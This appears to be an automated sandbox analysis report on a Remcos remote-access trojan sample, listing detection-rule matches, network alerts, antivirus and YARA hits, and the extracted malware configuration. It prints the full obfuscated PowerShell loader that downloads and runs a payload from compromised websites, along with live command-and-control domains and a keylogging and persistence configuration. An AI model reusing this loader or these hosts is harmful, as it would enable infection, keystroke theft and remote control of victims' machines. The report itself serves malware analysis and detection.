s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPS
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPS
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, ParentProcessId: 4368, ParentProcessName: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , ProcessId: 6064, ProcessName: wscript.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, ParentProcessId: 4368, ParentProcessName: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , ProcessId: 6064, ProcessName: wscript.exe
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, ParentProcessId: 4368, ParentProcessName: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , ProcessId: 6064, ProcessName: wscript.exe
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, ParentProcessId: 4368, ParentProcessName: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , ProcessId: 6064, ProcessName: wscript.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPS
                      No Snort rule has matched
                      Timestamp:2024-07-26T15:47:17.348366+0200
                      SID:2022930
                      Source Port:443
                      Destination Port:49719
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-26T15:47:46.464115+0200
                      SID:2022930
                      Source Port:443
                      Destination Port:60844
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-26T15:47:17.073744+0200
                      SID:2803305
                      Source Port:49718
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Unknown Traffic
                      Timestamp:2024-07-26T15:47:10.549159+0200
                      SID:2012510
                      Source Port:443
                      Destination Port:49716
                      Protocol:TCP
                      Classtype:Potentially Bad Traffic
                      Timestamp:2024-07-26T15:46:57.550213+0200
                      SID:2032776
                      Source Port:49710
                      Destination Port:57484
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T15:46:59.104341+0200
                      SID:2032777
                      Source Port:57484
                      Destination Port:49710
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T15:51:01.217929+0200
                      SID:2032777
                      Source Port:57484
                      Destination Port:49710
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T15:49:00.094689+0200
                      SID:2032777
                      Source Port:57484
                      Destination Port:49710
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T15:47:17.199149+0200
                      SID:2012510
                      Source Port:443
                      Destination Port:49718
                      Protocol:TCP
                      Classtype:Potentially Bad Traffic
                      Timestamp:2024-07-26T15:47:01.925387+0200
                      SID:2803304
                      Source Port:49713
                      Destination Port:80
                      Protocol:TCP
                      Classtype:Unknown Traffic

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeAvira: detected
                      Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfmAvira URL Cloud: Label: malware
                      Source: https://asociatiatraditiimaria.ro/os/transportment.pfmAvira URL Cloud: Label: malware
                      Source: iwarsut775laudrye2.duckdns.orgAvira URL Cloud: Label: malware
                      Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0Avira URL Cloud: Label: malware
                      Source: https://new.quranushaiqer.org.saAvira URL Cloud: Label: malware
                      Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfmlAvira URL Cloud: Label: phishing
                      Source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpackMalware Configuration Extractor: Remcos {"Version": "5.1.0 Pro", "Host:Port:Password": "iwarsut775laudrye2.duckdns.org:57484:0iwarsut775laudrye2.duckdns.org:57483:1iwarsut775laudrye3.duckdns.org:57484:0hjnourt38haoust1.duckdns.org:57484:0", "Assigned name": "MAGIC", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "shietgtst-A57Q98", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "sfvnspt.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                      Source: Yara matchFile source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3792, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3504, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00433837
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,4_2_00404423
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a7d83305-1

                      Exploits

                      barindex
                      Source: Yara matchFile source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3792, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3504, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_004074FD _wcslen,CoGetObject,0_2_004074FD
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 93.113.54.56:443 -> 192.168.2.6:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.166.62.190:443 -> 192.168.2.6:49723 version: TLS 1.2
                      Source: Binary string: m.Core.pdb source: powershell.exe, 00000007.00000002.4567700425.0000000006D69000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Automation.pdb source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdb source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.4570530076.0000000008800000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbS(b source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: em.pdb source: powershell.exe, 00000007.00000002.4567700425.0000000006D69000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: tem.Core.pdbd source: powershell.exe, 0000000B.00000002.4570530076.0000000008800000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: stem.Core.pdbP source: powershell.exe, 0000000B.00000002.4570530076.0000000008800000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409253
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C291
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C34D
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409665
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0044E879 FindFirstFileExA,0_2_0044E879
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_0040880C
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040783C FindFirstFileW,FindNextFileW,0_2_0040783C
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419AF5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB30
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD37
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_100010F1
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_10006580 FindFirstFileExA,0_2_10006580
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,4_2_0040AE51
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407EF8
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407898
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407C97

                      Software Vulnerabilities

                      barindex
                      Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: iwarsut775laudrye2.duckdns.org
                      Source: unknownDNS query: name: iwarsut775laudrye2.duckdns.org
